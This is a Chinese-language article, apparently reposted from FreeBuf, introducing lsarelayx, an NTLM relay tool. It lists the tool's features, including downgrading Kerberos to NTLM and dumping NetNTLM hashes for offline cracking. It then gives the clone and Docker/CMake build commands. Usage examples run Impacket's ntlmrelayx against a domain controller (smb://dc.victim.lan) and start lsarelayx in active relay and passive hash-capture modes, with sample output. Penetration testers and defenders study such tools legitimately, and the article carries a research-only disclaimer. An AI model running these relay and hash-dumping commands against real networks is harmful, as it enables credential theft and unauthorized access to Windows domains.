关于lsarelayx
功能介绍
1、在系统范围内中继NTLM连接,包括SMB、HTTP/HTTPS、LDAP/LDAPS或实现Windows身份验证API的任何其他第三方应用程序。 2、在可能的情况下,将传入的Kerberos身份验证请求降级为NTLM。这将导致尝试传统Kerberos身份验证的客户端退回到NTLM。 3、对中继用户执行LDAP查询,以获取组成员信息并为原始请求创建正确的身份验证令牌。 4、转储NetNTLM消息以进行脱机破解。 5、支持被动模式,无中继切仅转储捕获的NetNTLM哈希(此模式下无Kerberos降级)。
工具下载
git clone https://github.com/CCob/lsarelayx.git
工具构建
Docker
Docker(Windows Powershell)
docker run --rm -it -v $env:pwd:/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; --build . --target install/strip"
Docker(Linux)
docker run --rm -it -v $(pwd):/root/lsarelayx ccob/windows_cross:latest /bin/bash -c "cd /root/lsarelayx; mkdir build; cd build; cmake -DCMAKE_INSTALL_PREFIX=/root/lsarelayx/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..; cmake --build . --target install/strip"
Linux
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_TOOLCHAIN_FILE=../toolchain/Linux-mingw64.cmake ..
cmake --build . --target install/strip
Windows(Powershell)
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=$PWD/dist -DCMAKE_BUILD_TYPE=MinSizeRel -G "MinGW Makefiles" ..
cmake --build . --target install/strip
工具使用
主动模式
python examplesntlmrelayx.py -smb2support --no-wcf-server --no-smb-server --no-http-server "-t" smb://dc.victim.lan
Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
lsarelayx.exe --host 192.168.1.1
[+] Using 192.168.1.1:6666 for relaying NTLM connections
[=] Attempting to load LSA plugin C:usersAdministratorDesktopliblsarelayx.dll
被动模式
lsarelayx.exe
[=] No host supplied, switching to passive mode
[=] Attempting to load LSA plugin C:usersAdministratorDesktopliblsarelayx.dll
项目地址
参考资料
原文始发于微信公众号(FreeBuf):lsarelayx:一款功能强大的NTLM中继工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论